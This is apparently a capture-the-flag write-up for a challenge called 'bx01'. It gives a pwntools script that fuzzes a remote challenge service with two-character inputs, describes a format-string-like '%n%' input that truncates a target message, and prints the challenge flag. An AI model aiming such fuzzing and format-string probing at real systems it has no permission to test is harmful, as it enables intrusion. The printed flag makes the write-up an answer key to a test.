+++
title = "bx01"
+++

This one was weird. Just connect to a remote and find a vulnerability.

I ended up using something that looked like this:
```python
from pwn import *
import itertools

for pair in itertools.product(string.printable, string.printable):
    p = remote("ggcs-bx01.allyourbases.co", 9171)
    p.sendline(pair[0] + pair[1])
    resp = pair[0] + pair[1] + ": " + p.recvall().decode("ascii")
    if "Invalid service request" not in resp:
        print(resp)
```

As it turns out, `%` triggers some kind of format string?

About an hour of fuzzing later, I found I could prepend values and use `%n%` to replace characters from the target
string. For example, the following interaction happened:
```text
Right now I would be number 1337
That's leet and all but won't you make me number 1?
> 111111111111111111 %n%

Object validated, contents is 'Right now I would be n'
```

Perhaps we're intended to make it say `Right now I would be number 1`?
```text
Right now I would be number 1337
That's leet and all but won't you make me number 1?
> 1111111111111111111111111 %n%

Object validated, contents is 'Right now I would be number 1'

Flag: tRUNkated-EveRYTHinG-6761
```

It works, I'm not gonna question it.